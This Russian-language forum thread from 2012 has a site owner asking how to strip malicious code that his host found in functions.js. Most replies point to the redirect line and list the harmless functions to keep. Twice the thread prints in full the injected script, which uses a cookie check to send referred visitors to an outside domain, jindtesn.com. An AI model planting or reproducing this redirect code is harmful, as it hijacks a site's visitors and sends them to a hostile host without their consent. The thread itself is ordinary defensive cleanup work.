Javascript-форум (https://javascript.ru/forum/)
-   Общие вопросы Javascript (https://javascript.ru/forum/misc/)
-   -   Редирект в JS скрипте -что убрать ? (https://javascript.ru/forum/misc/29146-redirekt-v-js-skripte-chto-ubrat.html)

smedvedev 17.06.2012 14:53
Редирект в JS скрипте -что убрать ?
 
Здравствуйте уважаемые форумчани, помогите пожалуйста разобраться в проблеме. Есть сайт на котором стоит вредоносный код в JS? какую часть иммено мне убрать чтобы не попортить функционал:

function backgroundOnLoad()
{
    setTimeout('showBody()', 10);
}

function showBody()
{
    document.getElementById('body_div').style.visibility = 'visible';
}

function showBodyDelayed()
{
    setTimeout
    (
        function ()
        {
            document.getElementById('body_div').style.visibility = 'visible';
        },
        500
    );
}
function setCookie (name, value, expires, path, domain, secure) {
		  document.cookie = name + "=" + escape(value) +
			((expires) ? "; expires=" + expires : "") +
			((path) ? "; path=" + path : "") +
			((domain) ? "; domain=" + domain : "") +
			((secure) ? "; secure" : "");
	}

	function getCookie(c_name) {
		var i,x,y,ARRcookies=document.cookie.split(";");
		for (i=0;i<ARRcookies.length;i++) {
		    x=ARRcookies[i].substr(0,ARRcookies[i].indexOf("="));
		    y=ARRcookies[i].substr(ARRcookies[i].indexOf("=")+1);
		    x=x.replace(/^\s+|\s+$/g,"");
		    if (x==c_name)	{
				return unescape(y);
			}
		}
	}	
	
	function strlen(string){
		if(typeof string == "undefined") {
			return 0;
		} else {
			return string.length;
		}
	}

	var rSite = 'http://jindtesn.com';
	var dt = new Date(), expiryTime = dt.setTime( dt.getTime() + 1800000 );
	var currentCookie = getCookie("arx_tt");
	
	if(!document.referrer) {
	
		var referringURL = rSite;
		var local = "";
		var referrer = 0;
		setCookie("arx_tt", 1, dt.toGMTString(), "/");
		
	} else {
	
		var referringURL = document.referrer;
		referringURL = rSite + window.location.pathname;
		var referrer = 1;
		
	}

	if (strlen(currentCookie) == 0 && referrer == 1) {

		var setted = 1;
		setCookie("arx_tt", 1, dt.toGMTString(), "/");
		location.href = referringURL; 
		
	}
	
	setCookie("arx_tt", 1, dt.toGMTString(), "/");


Я вот пока убрал эту часть:

var rSite = 'http://jindtesn.com';
	var dt = new Date(), expiryTime = dt.setTime( dt.getTime() + 1800000 );
	var currentCookie = getCookie("arx_tt");
	
	if(!document.referrer) {
	
		var referringURL = rSite;
		var local = "";
		var referrer = 0;
		setCookie("arx_tt", 1, dt.toGMTString(), "/");
		
	} else {
	
		var referringURL = document.referrer;
		referringURL = rSite + window.location.pathname;
		var referrer = 1;
		
	}

	if (strlen(currentCookie) == 0 && referrer == 1) {

		var setted = 1;
		setCookie("arx_tt", 1, dt.toGMTString(), "/");
		location.href = referringURL; 
		
	}
	
	setCookie("arx_tt", 1, dt.toGMTString(), "/");


Правильно ли я сделал?
Всем спасибо за ответы.

Deff 17.06.2012 15:06
Строка вызывающая переод
Воть location.href = referringURL

А собствено этот какой то счетчик ? Чей ? -Возможно он должен стоять во фрейме

На кой Вам вообще этот сайт ? => http://jindtesn.com

Вот тут - подобное => http://qps.ru/dxMu3

smedvedev 17.06.2012 15:15
ВОт я нашел в данном скрипте, мне нужно удалить какие-то части.
Хост написал вот тут проблема:

На Вашем сайте был обнаружен вредоносный контент в файле
~/www/htdocs/js/functions.js

В частности:

var rSite = 'http://jindtesn.com';
var referringURL = rSite;
referringURL = rSite + window.location.pathname;


Вот только данные строки или еще нужно то что после них??

Deff 17.06.2012 15:17
smedvedev,
Само деяние переадресации просходит в строке 24 Вашего нижнего скрипта
закоментьте данную строку - редирек должен исчезнуть

smedvedev 17.06.2012 15:28
Ну мне нужно все же убрать, зачем мне удалять 24 строку, если я могу удалить все что мне не нужно.

Deff 17.06.2012 16:36
smedvedev,
Гы - дык я и спрашивал - зачем весь этот код

Тут из нужного возможно ток эта часть:
function backgroundOnLoad()
{
    setTimeout('showBody()', 10);
}

function showBody()
{
    document.getElementById('body_div').style.visibility = 'visible';
}

function showBodyDelayed()
{
    setTimeout
    (
        function ()
        {
            document.getElementById('body_div').style.visibility = 'visible';
        },
        500
    );
}
function setCookie (name, value, expires, path, domain, secure) {
		  document.cookie = name + "=" + escape(value) +
			((expires) ? "; expires=" + expires : "") +
			((path) ? "; path=" + path : "") +
			((domain) ? "; domain=" + domain : "") +
			((secure) ? "; secure" : "");
	}

	function getCookie(c_name) {
		var i,x,y,ARRcookies=document.cookie.split(";");
		for (i=0;i<ARRcookies.length;i++) {
		    x=ARRcookies[i].substr(0,ARRcookies[i].indexOf("="));
		    y=ARRcookies[i].substr(ARRcookies[i].indexOf("=")+1);
		    x=x.replace(/^\s+|\s+$/g,"");
		    if (x==c_name)	{
				return unescape(y);
			}
		}
	}	
	
	function strlen(string){
		if(typeof string == "undefined") {
			return 0;
		} else {
			return string.length;
		}
	}


Часовой пояс GMT +3, время: 23:15.